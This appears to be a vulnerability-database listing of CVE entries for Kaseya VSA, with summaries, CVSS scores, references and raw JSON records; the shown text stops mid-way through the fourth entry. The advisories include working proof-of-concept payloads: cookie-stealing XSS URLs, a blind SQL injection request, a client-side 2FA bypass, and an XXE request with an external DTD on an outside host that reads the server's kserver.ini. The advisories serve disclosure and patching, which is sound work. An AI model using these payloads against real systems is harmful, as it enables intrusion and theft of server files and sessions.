Search criteria
21 vulnerabilities found for vsa by kaseya
FKIE_CVE-2021-30119
Vulnerability from fkie_nvd - Published: 2021-07-09 14:15 - Updated: 2024-11-21 06:03
Severity ?
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Summary
Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=";</script><script>alert(1);a="&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078`
References
| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ | Patch, Third Party Advisory | |
| cve@mitre.org | https://csirt.divd.nl/CVE-2021-30119 | Exploit, Third Party Advisory | |
| cve@mitre.org | https://csirt.divd.nl/DIVD-2021-00011 | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/CVE-2021-30119 | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/DIVD-2021-00011 | Patch, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*",
"matchCriteriaId": "2CF9574C-46BA-4D17-A59E-8D1E2D3966B9",
"versionEndExcluding": "9.5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=\";\u003c/script\u003e\u003cscript\u003ealert(1);a=\"\u0026PathData=\u0026originalName=shell.aspx\u0026FileSize=4388\u0026TimeElapsed=00:00:00.078`"
},
{
"lang": "es",
"value": "XSS reflexivo autenticado en HelpDeskTab/rcResults.asp El par\u00e1metro result de /HelpDeskTab/rcResults.asp se devuelve de forma insegura en la p\u00e1gina web solicitada y puede utilizarse para realizar un ataque de Cross Site Scripting Ejemplo de solicitud: `https://x.x.x.x/HelpDeskTab/rcResults. asp?result=` Lo mismo ocurre con el par\u00e1metro FileName de /done.asp Petici\u00f3n de ejemplo: `https://x.x.x.x/done.asp?FileName=\";"
}
],
"id": "CVE-2021-30119",
"lastModified": "2024-11-21T06:03:20.583",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-07-09T14:15:07.873",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/CVE-2021-30119"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/CVE-2021-30119"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2021-30120
Vulnerability from fkie_nvd - Published: 2021-07-09 14:15 - Updated: 2024-11-21 06:03
Severity ?
9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Summary
Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in.
References
| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ | Patch, Third Party Advisory | |
| cve@mitre.org | https://csrit.divd.nl/CVE-2021-30120 | Permissions Required, Third Party Advisory | |
| cve@mitre.org | https://csrit.divd.nl/DIVD-2021-00011 | Permissions Required, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csrit.divd.nl/CVE-2021-30120 | Permissions Required, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csrit.divd.nl/DIVD-2021-00011 | Permissions Required, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*",
"matchCriteriaId": "13B1AE73-6472-40B0-914E-4EB9A4C7270D",
"versionEndIncluding": "9.5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in."
},
{
"lang": "es",
"value": "Kaseya VSA antes de la versi\u00f3n 9.5.7 permite a los atacantes eludir el requisito de 2FA. La necesidad de usar 2FA para la autenticaci\u00f3n en la aplicaci\u00f3n del lado del cliente en lugar del lado del servidor y puede ser evadida usando un proxy local. De este modo, se hace in\u00fatil la 2FA. Descripci\u00f3n detallada --- Durante el proceso de inicio de sesi\u00f3n, despu\u00e9s de que el usuario se autentique con nombre de usuario y contrase\u00f1a, el servidor env\u00eda una respuesta al cliente con los booleanos MFARequired y MFAEnroled. Si el atacante ha obtenido la contrase\u00f1a de un usuario y ha utilizado un proxy de intercepci\u00f3n (por ejemplo, Burp Suite) para cambiar el valor de MFARequered de True a False, no se solicita el segundo factor, pero el usuario sigue conectado"
}
],
"id": "CVE-2021-30120",
"lastModified": "2024-11-21T06:03:20.730",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.1,
"impactScore": 6.0,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-07-09T14:15:07.903",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"source": "cve@mitre.org",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://csrit.divd.nl/CVE-2021-30120"
},
{
"source": "cve@mitre.org",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://csrit.divd.nl/DIVD-2021-00011"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://csrit.divd.nl/CVE-2021-30120"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://csrit.divd.nl/DIVD-2021-00011"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-669"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2021-30117
Vulnerability from fkie_nvd - Published: 2021-07-09 14:15 - Updated: 2024-11-21 06:03
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"></link> ----SNIP---- ``` However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP ----- ```
References
| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ | Third Party Advisory | |
| cve@mitre.org | https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021 | Release Notes, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021 | Release Notes, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*",
"matchCriteriaId": "3A890109-5AD9-4684-A46D-A80D6A5F1834",
"versionEndExcluding": "9.5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 \u003c!DOCTYPE html\u003e \u003cHTML\u003e \u003cHEAD\u003e \u003ctitle\u003eWhoops.\u003c/title\u003e \u003cmeta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /\u003e \u003clink id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"\u003e\u003c/link\u003e ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 \u003chtml\u003e \u003chead\u003e \u003ctitle\u003eExport Folder\u003c/title\u003e \u003cstyle\u003e ------ SNIP ----- ```"
},
{
"lang": "es",
"value": "La llamada a la API /InstallTab/exportFldr.asp es vulnerable a una inyecci\u00f3n SQL ciega semiautenticada basada en booleanos en el par\u00e1metro fldrId. Descripci\u00f3n detallada --- Dada la siguiente petici\u00f3n: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u0027 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026amp;roleId=2; webWindowId=59091519; ``` Donde el valor de la cookie sessionId se ha obtenido mediante CVE-2021-30116. El resultado deber\u00eda ser un fallo. Respuesta: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 Whoops. ----SNIP---- ``` Sin embargo, cuando fldrId est\u00e1 configurado como \u0027(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u0027 la petici\u00f3n est\u00e1 permitida. Solicitud: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29END%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026amp;roleId=2; webWindowId=59091519; ``` Respuesta: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 Carpeta de exportaci\u00f3n "
}
],
"id": "CVE-2021-30117",
"lastModified": "2024-11-21T06:03:20.263",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-07-09T14:15:07.810",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2021-30201
Vulnerability from fkie_nvd - Published: 2021-07-09 14:15 - Updated: 2024-11-21 06:03
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Summary
The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---> There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.
References
| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ | Patch, Third Party Advisory | |
| cve@mitre.org | https://csirt.divd.nl/CVE-2021-30201 | Exploit, Third Party Advisory | |
| cve@mitre.org | https://csirt.divd.nl/DIVD-2021-00011 | Patch, Third Party Advisory | |
| cve@mitre.org | https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021 | Release Notes, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/CVE-2021-30201 | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://csirt.divd.nl/DIVD-2021-00011 | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021 | Release Notes, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*",
"matchCriteriaId": "3A890109-5AD9-4684-A46D-A80D6A5F1834",
"versionEndExcluding": "9.5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"\u003e \u003csoapenv:Header/\u003e \u003csoapenv:Body\u003e \u003ckas:PrimitiveResetPassword\u003e \u003c!--type: string--\u003e \u003ckas:XmlRequest\u003e\u003c![CDATA[\u003c!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"\u003e\u003cdata\u003e\u0026send;\u003c/data\u003e]]\u003e \u003c/kas:XmlRequest\u003e \u003c/kas:PrimitiveResetPassword\u003e \u003c/soapenv:Body\u003e 